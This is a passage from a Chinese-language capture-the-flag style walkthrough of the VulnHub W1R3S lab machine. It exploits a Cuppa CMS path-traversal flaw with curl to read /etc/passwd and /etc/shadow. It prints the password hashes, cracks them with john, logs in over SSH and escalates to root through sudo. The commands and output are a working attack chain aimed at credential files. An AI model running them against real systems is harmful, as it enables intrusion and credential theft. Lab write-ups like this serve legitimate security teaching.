Decode Output:-----------------------------------------------------------------------------<?php        class Configuration{                public $host = "localhost";                public $db = "cuppa";                public $user = "root";                public $password = "Db@dmin";                public $table_prefix = "cu_";                public $administrator_template = "default";                public $list_limit = 25;                public $token = "OBqIPqlFWf3X";                public $allowed_extensions = ".bmp; .csv; .doc; .gif; .ico; .jpg; .jpeg; .odg; .odp; .ods; .odt; .pdf; .png; .ppt; .swf; .txt; .xcf; .xls; .docx; .xlsx";                public $upload_default_path = "media/uploadsFiles";                public $maximum_file_size = "5242880";                public $secure_login = 0;                public $secure_login_value = "";                public $secure_login_redirect = "";        }?>-----------------------------------------------------------------------------Able to read sensitive information via File Inclusion (PHP Stream)Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2################################################################################################################

根据Exp提供的路径,我们可以尝试读取passwd文件,不过在以下这个路径中,只有alarts是可以确定的,但是前面的路径经过尝试是访问不了的,试了一下路径是administator/cuppa/alerts/alertConfigField.php可以访问的,但是没有成功读取passwd的内容  

不可访问路径http://targetIP/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd可访问路径http://192.168.16.129/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

  Vulnnhub | W1R3S靶场练习   不知道是那里出问题了,原本想用exp提供的第三方网站来下载cuppa_cms的源代码,但是访问不到,那就直接用浏览器搜吧。查看漏洞所在位置,是传参方式出问题了,在这个地方使用的是POST方式接收参数的 

  Vulnnhub | W1R3S靶场练习 知道是哪里出问题了就好解决了,接下来我们使用curl命令来经行POST传参,参数需要经行base64编码。执行命令后成功读取了passwd的内容  

参数 介绍
--data-urlencode
将指定参数经行base64编码,并以post方式传递
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.16.129/administrator/alerts/alertConfigField.php<style>    .new_content{        position: fixed;    }    .alert_config_field{        font-size:12px;        background:#FFF;        position:relative;        border-radius: 3px;        box-shadow: 0px 0px 5px rgba(0,0,0,0.2);        overflow:hidden;        position:fixed;        top:50%;        left:50%;        width:600px;        height:440px;        margin-left:-300px;        margin-top:-220px;    }    .alert_config_top{        position: relative;        margin: 2px;        margin-bottom: 0px;        border: 1px solid #D2D2D2;        background: #4489F8;        overflow: auto;        color:#FFF;        font-size: 13px;        padding: 7px 5px;        box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);        text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);    }    .description_alert{        position:relative;        font-size:12px;        text-shadow:0 1px #FFFFFF;        font-weight: normal;        padding: 5px 0px 5px 0px;    }    .btnClose_alert{        position:absolute;        top: 4px; right: 2px;        width:22px;        height:22px;        cursor:pointer;        background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;        background-position: center;        background-size: 13px;    }    .content_alert_config{        position:relative;        clear:both;        margin: 2px;        margin-top: 0px;        height: 401px;        padding: 10px;        overflow: auto;    }</style><script>functionCloseDefaultAlert(){                cuppa.setContent({'load':false, duration:0.2});        cuppa.blockade({'load':false, duration:0.2, delay:0.1});        }</script><div id="alert">    <div>        <strong>Configuration</strong>:         <div id="btnClose_alert" onclick="CloseDefaultAlert()"></div>    </div>    <div id="content_alert_config">        root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologinsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/falsesystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/falsesystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/falsesystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/falsesyslog:x:104:108::/home/syslog:/bin/false_apt:x:105:65534::/nonexistent:/bin/falsemessagebus:x:106:110::/var/run/dbus:/bin/falseuuidd:x:107:111::/run/uuidd:/bin/falselightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/falsewhoopsie:x:109:117::/nonexistent:/bin/falseavahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/falseavahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/falsednsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/falsecolord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/falsespeech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/falsehplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/falsekernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/falsepulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/falsertkit:x:118:126:RealtimeKit,,,:/proc:/bin/falsesaned:x:119:127::/var/lib/saned:/bin/falseusbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/falsew1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bashsshd:x:121:65534::/var/run/sshd:/usr/sbin/nologinftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/falsemysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false    </div></div>  既然passwd文件可以读取,那我们试一下可不可以读取shadow文件,也是成功读取了  ┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ curl --data-urlencode 'urlConfig=../../../../../../../../../etc/shadow' http://192.168.16.129/administrator/alerts/alertConfigField.php<style>    .new_content{        position: fixed;    }    .alert_config_field{        font-size:12px;        background:#FFF;        position:relative;        border-radius: 3px;        box-shadow: 0px 0px 5px rgba(0,0,0,0.2);        overflow:hidden;        position:fixed;        top:50%;        left:50%;        width:600px;        height:440px;        margin-left:-300px;        margin-top:-220px;    }    .alert_config_top{        position: relative;        margin: 2px;        margin-bottom: 0px;        border: 1px solid #D2D2D2;        background: #4489F8;        overflow: auto;        color:#FFF;        font-size: 13px;        padding: 7px 5px;        box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);        text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);    }    .description_alert{        position:relative;        font-size:12px;        text-shadow:0 1px #FFFFFF;        font-weight: normal;        padding: 5px 0px 5px 0px;    }    .btnClose_alert{        position:absolute;        top: 4px; right: 2px;        width:22px;        height:22px;        cursor:pointer;        background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;        background-position: center;        background-size: 13px;    }    .content_alert_config{        position:relative;        clear:both;        margin: 2px;        margin-top: 0px;        height: 401px;        padding: 10px;        overflow: auto;    }</style><script>functionCloseDefaultAlert(){                cuppa.setContent({'load':false, duration:0.2});        cuppa.blockade({'load':false, duration:0.2, delay:0.1});        }</script><div id="alert">    <div>        <strong>Configuration</strong>:         <div id="btnClose_alert" onclick="CloseDefaultAlert()"></div>    </div>    <div id="content_alert_config">        root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::daemon::17379:0:99999:7:::bin::17379:0:99999:7:::sys::17379:0:99999:7:::sync::17379:0:99999:7:::games::17379:0:99999:7:::man::17379:0:99999:7:::lp::17379:0:99999:7:::mail::17379:0:99999:7:::news::17379:0:99999:7:::uucp::17379:0:99999:7:::proxy::17379:0:99999:7:::www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::backup::17379:0:99999:7:::list::17379:0:99999:7:::irc::17379:0:99999:7:::gnats::17379:0:99999:7:::nobody::17379:0:99999:7:::systemd-timesync::17379:0:99999:7:::systemd-network::17379:0:99999:7:::systemd-resolve::17379:0:99999:7:::systemd-bus-proxy::17379:0:99999:7:::syslog::17379:0:99999:7:::_apt::17379:0:99999:7:::messagebus::17379:0:99999:7:::uuidd::17379:0:99999:7:::lightdm::17379:0:99999:7:::whoopsie::17379:0:99999:7:::avahi-autoipd::17379:0:99999:7:::avahi::17379:0:99999:7:::dnsmasq::17379:0:99999:7:::colord::17379:0:99999:7:::speech-dispatcher:!:17379:0:99999:7:::hplip::17379:0:99999:7:::kernoops::17379:0:99999:7:::pulse::17379:0:99999:7:::rtkit::17379:0:99999:7:::saned::17379:0:99999:7:::usbmux::17379:0:99999:7:::w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::sshd::17554:0:99999:7:::ftp::17554:0:99999:7:::mysql:!:17554:0:99999:7:::    </div></div>

存储在shadow.hash文件中,然后用john破解,只爆破出了www-data和w1r3s两个用户的密码,root的密码先让john继续爆吧  

用户 密码
www-data
www-data
w1r3s
computer
┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo john shadow.hashWarning: detected hashtype"sha512crypt", but the string is also recognized as "HMAC-SHA256"Use the "--format=HMAC-SHA256" option to force loading these as that type insteadUsing default input encoding: UTF-8Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])Cost 1 (iteration count) is 5000 for all loaded hashesWill run 12 OpenMP threadsProceeding with single, rules:SinglePress 'q' or Ctrl-C to abort, almost any other key for statuswww-data         (www-data)     Almost done: Processing the remaining buffered candidate passwords, if any.Proceeding with wordlist:/usr/share/john/password.lstcomputer         (w1r3s)     Proceeding with incremental:ASCII  使用w1r3s进行ssh登录,成功登录,获取立足点  ┌──(kali㉿kali)-[~/靶机信息/vlunhub/W1R3S]└─$ sudo ssh [email protected]                    The authenticity of host '192.168.16.129 (192.168.16.129)' can't be established.ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.16.129' (ED25519) to the list of known hosts.----------------------Think this is the way?----------------------Well,........possibly.----------------------[email protected]'s password: Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)  Documentation:  https://help.ubuntu.com  Management:     https://landscape.canonical.com * Support:        https://ubuntu.com/advantage108 packages can be updated.6 updates are security updates......You made it huh?....Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35w1r3s@W1R3S:~$ whoamiw1r3s四、权限提升  root的密码爆了两年半也没爆出来,不爆了,看看当前用户有什么权限,该用户有sudo权限,那再看看有哪些可以执行哪些系统及命令,all所有系统命令都可以执行  w1r3s@W1R3S:~$ iduid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)w1r3s@W1R3S:~$ sudo -lsudo: unable to resolve host W1R3S[sudo] password for w1r3s: Matching Defaults entries for w1r3s on W1R3S:    env_reset, mail_badpass,    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binUser w1r3s may run the following commands on W1R3S:    (ALL : ALL) ALL  那这个用户就相当于是root用户了,使用sudo启动一个新的bash会话,也是拿到root权限了  w1r3s@W1R3S:~$ sudo /bin/bashsudo: unable to resolve host W1R3Sroot@W1R3S:~# whoamirootroot@W1R3S:~# iduid=0(root) gid=0(root) groups=0(root)root@W1R3S:~# ip a1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00    inet 127.0.0.1/8 scope host lo       valid_lft forever preferred_lft forever    inet6 ::1/128 scope host        valid_lft forever preferred_lft forever2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000link/ether 00:0c:29:37:f4:3d brd ff:ff:ff:ff:ff:ff    inet 192.168.16.129/24 brd 192.168.16.255 scope global dynamic ens33       valid_lft 255213sec preferred_lft 255213sec    inet6 fe80::dfa7:d085:91b:320f/64 scope link       valid_lft forever preferred_lft forever  找一下flag吧  root@W1R3S:~# cd /rootroot@W1R3S:/root# lsflag.txtroot@W1R3S:/root# cat flag.txt-----------------------------------------------------------------------------------------   ____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____    / ___/ _ |  | |/ ___|  _     / |_   _| | | | |      / |_   _|_ _/ _ |  | / ___|  | |  | | | |  | | |  _| |_) |  / _  | | | | | | |     / _  | |  | | | | |  | ___   | |__| |_| | |  | |_| |  _ <  / ___ | | | |_| | |___ / ___ | |  | | |_| | |  |___) |  _______/|_| _|____|_| _/_/   __|  ___/|_____/_/   __| |______/|_| _|____/ -----------------------------------------------------------------------------------------                          .-----------------TTTT_-----_______                        /''''''''''(______O] ----------____  ______/]_     __...---'"""_ --''   Q                               ___________@ |'''                   ._   _______________=---------""""""" |                ..--''|   l L |_l   | |          ..--''      .  /-___j '   ' |    ..--''           /  ,       '   ' |--''                /           `                          L__'             -                                    -    '-.                                     '.    /                                       '-./----------------------------------------------------------------------------------------  YOU HAVE COMPLETED THE               __      __  ______________________   _________              /      /  /_   ______   _____   /   _____/                 //   / |   ||       _/ _(__  < _____                          /  |   ||    |   /       /                        __/  /   |___||____|_  /______  /_______  /.INC                     /                /       /        /        CHALLENGE, V 1.0----------------------------------------------------------------------------------------CREATED BY SpecterWires----------------------------------------------------------------------------------------
Vulnnhub | W1R3S靶场练习
END
Vulnnhub | W1R3S靶场练习

注:鼎星安全有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

原文始发于微信公众号(鼎新安全):Vulnnhub | W1R3S靶场练习

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月23日01:15:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnnhub | W1R3S靶场练习https://cn-sec.com/archives/3970195.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息